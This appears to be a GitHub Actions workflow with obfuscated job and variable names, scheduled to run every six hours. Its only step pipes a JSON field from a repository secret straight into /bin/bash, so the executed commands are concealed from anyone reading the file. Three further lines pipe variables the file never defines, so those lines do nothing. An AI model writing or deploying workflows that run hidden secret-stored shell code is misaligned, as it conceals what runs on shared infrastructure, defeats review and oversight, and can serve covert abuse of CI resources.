name: fengshuting6712
on:
  workflow_dispatch:
  schedule:
    - cron: '39 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fengshuting6712
        env:
          wc84: ${{ secrets.wc84 }}
        run: |
          echo $wc84 | jq -r .ghjor7427 | /bin/bash
          echo $arkba869 | jq -r .sudj64534 | /bin/bash
          echo $bayot72192 | jq -r .elopd71233 | /bin/bash
          echo $bsal49708 | jq -r .xp94816 | /bin/bash

